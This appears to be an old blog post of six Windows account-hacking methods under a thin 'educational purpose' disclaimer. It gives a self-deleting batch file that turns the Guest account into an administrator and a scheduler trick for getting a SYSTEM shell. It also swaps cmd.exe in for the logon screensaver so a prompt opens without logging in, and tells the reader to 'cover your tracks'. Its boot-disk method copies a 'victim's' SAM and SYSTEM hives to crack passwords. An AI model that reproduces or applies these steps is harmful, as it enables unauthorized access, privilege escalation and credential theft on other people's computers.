Please Dont miss use This ARTICLE. Its meant for "Educational Purpose" only or for helping
those who have lost their PASSWORD.
Before start you must know how to view all the user password.
To view all of the user accounts:
1) While logged onto the computer, click on Start>Run>and type in CMD.
2) From the command prompt window, type in net users. This will show you
every account that is made onto the computer whether it is hidden or not.
Ok. Then try these method.
METHOD 1:
Change an account password:
1) While logged onto the computer to an account that has administrative rights,
click on Start>Run>and type in CMD.
2) Type in net user then the name of the account then * and press enter.
heres an example: (lets say the user or administrator name is Joe Smith, so type as
net user "Joe Smith" *
Put the name in quotes if it contains spaces.
3) From there it should ask for a new password.
Type in your new password (type very carefully -
the command window won't display what you type) and once more to confirm it.
If you get the message that the command succeeded successfully you're all set!!
METHOD 2:
Hack "GUEST" with Admin privileges.
echo off
title Please wait...
cls
net user add Username Password /add
net user localgroup Administrators Username /add
net user Guest 420 /active:yes
net localgroup Guests Guest /DELETE
net localgroup Administrators Guest /add
del %0
Copy this to notepad and save the file as "Guest2admin.bat"
then u can double click the file to execute or run in the cmd.
METHOD 3 :
Become ‘SYSTEM USER’, and that’s because the ‘Administrator’
has not the full control of the system.
For your information, System User is the most powerful from the Administrator. It can go in
All System folders while Administrators can’t, and the SYSTEM user can do everything
on the computer.
1- Open Command Prompt
2- Type in “at 13:16 /interactive cmd.exe ”
3- Then, end current “explorer.exe”, by opening Task Manager, choose “Processes” tab,
and select “explorer.exe”, and Click “End Processes”
4- When time comes the Command Prompt will appear with title “svchost.exe”
5- Type in “explorer.exe”
6- Then, Here you are, you are the System User.
but if it responds with an “access denied” error, then we are out of luck, and you’ll
have to try another method of privilege escalation;
if it responds with “There are no entries in the list” (or sometimes with multiple entries already in the list) then we are good.
Lets say we are lucky, so when the system clock reaches the time you set, then a new command prompt will magically run. The difference is that this one is running with system privileges
(because it was started by the task scheduler service, which runs under the Local System
account).
It should look like this: You’ll notice that the title bar has changed from cmd.exe to svchost.exe
(which is short for Service Host). Now that we have our system command prompt,
you may close the old one. Run Task Manager by either pressing CTRL+ALT+DELETE or
typing taskmgr at the command prompt.
In task manager, go to the processes tab,
and kill explorer.exe; your desktop and all open folders should disappear,
but the system command prompt should still be there.
At the system command prompt, enter in the following:
Code:
explorer.exe
A desktop will come back up, but what this? It isn’t your desktop. Go to the
start menu and look at the user name, it should say “SYSTEM”. Also open up task manager
again, and you’ll notice that explorer.exe is now running as SYSTEM.
What to do now
Now that we have SYSTEM access, everything that we run from our explorer process
will have it too, browsers, games, etc. You also have the ability to reset the
administrators password, and kill other processes owned by SYSTEM. You can do anything
on the machine, the equivalent of root; You are now God of the Windows machine.
METHOD 4:
Start the Registry Editor Go to:
HKEY_LOCAL_MACHINE \ SOFTWARE \ Microsoft \ Windows NT \ CurrentVersion \ Winlogon \ SpecialAccounts \ UserList \
Right-click an empty space in the right pane and select New > DWORD Value Name the new value Administrator.
Double-click this new value, and enter 1 as it's Value data. Close the registry editor
and restart.
METHOD 5:
This is a cool little computer trick. Log in and go to your DOS command prompt and enter these commands exactly:
cd\
cd\windows\system32
mkdir temphack
copy logon.scr temphack\logon.scr
copy cmd.exe temphack\cmd.exe
del logon.scr
rename cmd.exe logon.scr
exit
So what you just told windows to backup is the command program and the screen saver file. Then you edited the settings so when windows loads the screen saver, you will get an unprotected dos prompt without logging in.
When this appears enter this command that’s in parenthesis (net user password). So if the admin user name is Doug
and you want the password 1234 then you would enter “net user Doug 1234? and now you’ve changed the admin password to 1234.
Log in, do what you want to do, copy the contents of temphack back into system32 to cover your tracks.
METHOD 6:
By using reboot file.
Here is it:
1. You should have your own computer at home and can use a cd writer.
2. Use nero 7 downloadable from net
3. Create bootable disk.
4. Bring the disk to your victims computer.
5. Boot from it.(it mounts NTFS)
6. Type “c:” enter
7. Type “dir” enter
8. If you see WINDOWS ok fine, we are good.
But if not you have to try other drive letters and do the same process (you can try d: or e:
until yo’ll find WINDOWS).
9. If succeed type “copy c:\windows\system32\config\SAM c:\folder” (this copy SAM & create
folder in c:)
10. Repeat but change “SAM” to “SYSTEM”.
11. Remember use “c:” only if you seen WINDOWS in “c:” but if not use the drive letter that has.
12. Get Offline Registry Editor from Pnordhal downloadable from net.
13. Follow instructions to use it. It will blank your administrator password.
14. Log on using administrator blank password.
15. Non-domain users press ctrl+alt+del (press del twice, del only).
16. Have a copy of SAMInside. Follow instructions using SAM file.(from internet)
17. Export users to PWDump file.
18. Have a copy of LOpthcrack 5
19. Follow instructions.crack passwd using importing PWDump. Browse the file and follow the
instructions, that’s it.
You have your administrator password and hack your own PC and bring back the original administrator password from users options.
This is only for local computers.
No comments:
Post a Comment